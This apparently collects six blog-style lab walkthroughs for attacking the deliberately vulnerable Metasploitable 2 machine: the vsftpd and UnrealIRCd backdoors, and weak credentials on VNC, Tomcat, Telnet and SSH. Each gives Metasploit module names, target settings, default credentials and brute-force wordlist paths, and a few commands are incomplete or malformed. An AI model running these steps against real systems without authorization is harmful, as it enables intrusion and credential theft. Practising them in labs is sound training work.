Janvi

FTP v2.3.4 Backdoor Exploitation

Katy Kookaburra — Mon, 13 Apr 2026 00:00:00 GMT

1. What is FTP?

FTP (File Transfer Protocol) is a standard network protocol used to transfer files between a client and a server over a TCP/IP network. It typically runs on port 21 and allows users to upload, download, and manage files on a remote server.

FTP supports:

Authentication (username & password)
Anonymous access (in some cases)
File operations (upload, download, delete, rename)

2. How FTP Works

FTP works on a client-server architecture and uses two channels:

Control Channel (Port 21):
Used for sending commands (login, file requests)
Data Channel (Port 20 or random port):
Used for transferring actual files

Process:

Client connects to FTP server
Server asks for credentials
Client authenticates (or uses anonymous login)
Commands are issued (LIST, GET, PUT)
Data is transferred over a separate channel

3. Vulnerability Exploited

Vulnerability Name:

VSFTPD v2.3.4 Backdoor Command Execution

Type:

Backdoor / Remote Command Execution (RCE)

CVE:

CVE-2011-2523

Description:

The FTP service running on Metasploitable 2 (VSFTPD v2.3.4) contains a malicious backdoor. When a specially crafted username is used (ending with :)), it triggers a hidden backdoor that opens a shell on port 6200.

4. How the Exploit Works (Concept)

The attacker connects to the FTP service.
Instead of normal credentials, a malicious username containing :) is entered.
This triggers the backdoor in the FTP service.
The backdoor opens a new port (6200) on the target machine.
The attacker connects to this port.
A shell is obtained with system-level access.

5. Exploitation

Recon using Nmap

nmap -sV 192.168.72.130

Step 1: Start Metasploit

msfconsole

Step 2: Search for the exploit

search vsftpd 2.3.4

Step 3: Use the exploit

use exploit/unix/ftp/vsftpd_234_backdoor

Step 4: Set target IP

set RHOSTS <target-ip>

Step 5: Run the exploit

run

6. Result

Successful exploitation opens a shell session.
You get command execution access on the target machine.
Example:

help

UnrealIRCd 3.2.8.1 Backdoor Exploitation

Katy Kookaburra — Mon, 13 Apr 2026 00:00:00 GMT

1. What is IRC?

IRC (Internet Relay Chat) is a communication protocol used for real-time text messaging between users over a network. It is commonly used for group discussions in channels as well as private messaging.

IRC supports:

Real-time messaging
Channel-based communication
Private messaging between users
File sharing (in some implementations)

2. How IRC Works

IRC works on a client-server architecture:

Port 6667: Default port used for IRC communication

Process:

Client connects to an IRC server
User sets a nickname and username
Client joins a channel or communicates directly
Messages are exchanged between users via the server

3. Vulnerability Exploited

Vulnerability Name:

UnrealIRCd 3.2.8.1 Backdoor Command Execution

Type:

Backdoor / Remote Command Execution (RCE)

CVE:

CVE-2010-2075

Description:

The UnrealIRCd 3.2.8.1 server contains a malicious backdoor that was introduced in a compromised version of its source code. This backdoor allows attackers to execute arbitrary commands on the server by sending a specially crafted command.

4. How the Exploit Works (Concept)

The attacker connects to the IRC service running on port 6667.
A specially crafted command starting with AB; is sent to the server.
The backdoor interprets this input as a system command.
The command is executed on the target machine.
The attacker gains remote command execution access.

5. Exploitation

Recon using Nmap

nmap -sV 192.168.72.130

Step 1: Start Metasploit

msfconsole

Step 2: Search for the exploit

search unrealircd

Step 3: Use the exploit

use exploit/unix/irc/unreal_ircd_3281_backdoor

Step 4: Set target IP

set RHOSTS <target-ip>

Step 5: Run the exploit

run

6. Result

Successful exploitation opens a shell session.
Remote command execution is achieved on the target machine. Example:

ls

VNC Weak Authentication Exploitation

Katy Kookaburra — Mon, 13 Apr 2026 00:00:00 GMT

1. What is VNC?

VNC (Virtual Network Computing) is a graphical desktop-sharing system that allows users to remotely control another computer over a network. It typically runs on port 5900 and provides access to the remote system’s GUI.

VNC supports:

Remote desktop access
Mouse and keyboard control
Graphical interface interaction

2. How VNC Works

VNC works on a client-server architecture:

Port 5900: Default port used for VNC connections

Process:

Client connects to the VNC server
Server requests authentication (password)
Client provides credentials
If valid, remote desktop session is established
User can control the system graphically

3. Vulnerability Exploited

Vulnerability Name:

Weak VNC Authentication

Type:

Authentication Weakness / Brute Force

CVE:

N/A (Configuration-based vulnerability)

Description:

The service running on port 5900/tcp is identified as VNC (protocol 3.3). This version often uses weak authentication mechanisms and may allow access with weak or no password. Attackers can exploit this by brute forcing or directly connecting if authentication is not properly configured.

4. How the Exploit Works (Concept)

The attacker scans the target and finds VNC running on port 5900.
The service is identified as VNC protocol 3.3.
The attacker uses a Metasploit module to brute force the VNC password.
Weak or default password is discovered.
The attacker gains access to the remote desktop.
Full graphical control of the system is achieved.

5. Exploitation

Recon using Nmap

nmap -sV 192.168.72.130

Step 1: Start Metasploit

msfconsole

Step 2: Search for VNC modules

search vnc

Step 3: Use VNC login module

use auxiliary/scanner/vnc/vnc_login

Step 4: Set target IP

set RHOSTS <target-ip>

Step 6: Run the module

run

Step 7: Connect to VNC session

vncviewer <target-ip>

6. Result

Metasploit successfully identifies the VNC password.
Remote desktop access is obtained.
The attacker gains full control over the target system’s graphical interface.

Apache Tomcat Manager Weak Credentials

Katy Kookaburra — Mon, 13 Apr 2026 00:00:00 GMT

1. What is Apache Tomcat?

Apache Tomcat is an open-source web server and servlet container used to run Java-based web applications. It typically runs on port 8180 (or 8080) and processes JSP (JavaServer Pages) and Servlets.

Tomcat supports:

Hosting Java web applications
JSP and Servlet execution
Web-based management interface

2. How Apache Tomcat Works

Tomcat works on a client-server architecture:

Port 8180: Used for HTTP communication

Process:

Client sends an HTTP request to the server
Tomcat processes the request
JSP/Servlet is executed
Response is returned to the client

3. Vulnerability Exploited

Vulnerability Name:

Apache Tomcat Manager Weak Credentials

Type:

Authentication Weakness / Remote Code Execution

CVE:

N/A (Configuration-based vulnerability)

Description:

The service running on port 8180/tcp is identified as Apache Tomcat/Coyote JSP engine 1.1. The Tomcat Manager interface is often exposed with weak or default credentials. If accessed, it allows attackers to upload malicious WAR files and execute code on the server.

4. How the Exploit Works (Concept)

The attacker scans the target and finds Tomcat running on port 8180.
The web interface (e.g., /manager/html) is accessed.
The attacker uses default or weak credentials to log in.
Once authenticated, a malicious WAR file is uploaded.
The server deploys the WAR file.
The attacker gains remote command execution.

5. Exploitation

Recon using Nmap

nmap -sV 192.168.72.130

Step 1: Start Metasploit

msfconsole

Step 2: Search for Tomcat modules

search tomcat

Step 3: Use Tomcat manager exploit

use exploit/multi/http/tomcat_mgr_upload

Step 4: Set target IP

set RHOSTS <target-ip>

Step 5: Set credentials

set USERNAME tomcat
set PASSWORD tomcat

Step 6: Set port

set RPORT

Step 7: Run the exploit

run

6. Result

Successful authentication to Tomcat Manager interface.
Malicious WAR file is uploaded and executed.
Remote shell access is obtained on the target machine.

Telnet Weak Credentials Exploitation

Katy Kookaburra — Mon, 13 Apr 2026 00:00:00 GMT

1. What is Telnet?

Telnet is a network protocol used to remotely access and manage systems over a TCP/IP network. It typically runs on port 23 and allows users to log into a remote machine and execute commands.

Telnet supports:

Remote login access
Command execution on remote systems
Communication between client and server

2. How Telnet Works

Telnet works on a client-server architecture using a single connection:

Port 23: Used for communication between client and server

Process:

Client connects to the Telnet server
Server prompts for username and password
User enters credentials
If valid, access to remote shell is granted
Commands can be executed on the target system

3. Vulnerability Exploited

Vulnerability Name:

Weak Credentials in Telnet Service

Type:

Authentication Weakness / Misconfiguration

CVE:

N/A (Configuration-based vulnerability)

Description:

The service running on port 23/tcp is identified as Linux telnetd. The Telnet service is configured with weak/default credentials, making it vulnerable to brute force or credential-based attacks using automated tools like Metasploit.

4. How the Exploit Works (Concept)

The attacker scans the target and finds Telnet running on port 23.
The service is identified as Linux telnetd.
The attacker uses a brute-force module in Metasploit.
A list of usernames and passwords is tested automatically.
Valid credentials are discovered.
The attacker logs in and gains shell access.

5. Exploitation

Recon using Nmap

nmap -sV 192.168.72.130

Step 1: Start Metasploit

msfconsole

Step 2: Search for Telnet modules

search telnet

Step 3: Use Telnet login module

use auxiliary/scanner/telnet/telnet_login

Step 4: Set target IP

set RHOSTS <target-ip>

Step 5: Set username and password list

set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set PASS_FILE +

Step 6: Run the module

run

6. Result

Metasploit successfully identifies valid Telnet credentials.
Using these credentials, shell access is obtained.
The attacker can execute commands on the target system.

Example:

whoami

SSH Weak Credentials Exploitation

Katy Kookaburra — Mon, 13 Apr 2026 00:00:00 GMT

1. What is SSH?

SSH (Secure Shell) is a network protocol used to securely access and manage systems over a TCP/IP network. It typically runs on port 22 and provides encrypted communication between client and server.

SSH supports:

Secure remote login
Encrypted command execution
Secure file transfer (SCP, SFTP)

2. How SSH Works

SSH works on a client-server architecture:

Port 22: Used for secure communication

Process:

Client connects to the SSH server
Server presents its public key
Client verifies the server
User authenticates using password or key
Secure shell access is established

3. Vulnerability Exploited

Vulnerability Name:

Weak Credentials in SSH Service

Type:

Authentication Weakness / Brute Force

CVE:

N/A (Configuration-based vulnerability)

Description:

The service running on port 22/tcp is identified as OpenSSH 4.7p1 Debian 8ubuntu1. The SSH service is vulnerable due to weak or default credentials, allowing attackers to gain unauthorized access through brute-force attacks using automated tools.

4. How the Exploit Works (Concept)

The attacker scans the target and finds SSH running on port 22.
The service version is identified as OpenSSH 4.7p1.
The attacker uses a brute-force module in Metasploit.
Multiple username and password combinations are attempted.
Valid credentials are discovered.
The attacker logs in and gains secure shell access.

5. Exploitation

Recon using Nmap

nmap -sV 192.168.72.130

Step 1: Start Metasploit

msfconsole

Step 2: Search for SSH modules

search ssh

Step 3: Use SSH login module

use auxiliary/scanner/ssh/ssh_login

Step 4: Set target IP

set RHOSTS <target-ip>

Step 5: Set username and password list

set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt

Step 6: Run the module

run

Step 7: Get a shell using valid credentials

use auxiliary/scanner/ssh/ssh_login
set USERNAME <found-user>
set PASSWORD <found-password>
set RHOSTS <target-ip>
run

6. Result

Metasploit successfully discovers valid SSH credentials.
Secure shell access is obtained on the target machine.
Commands can be executed with the privileges of the authenticated user.

Example:

whoami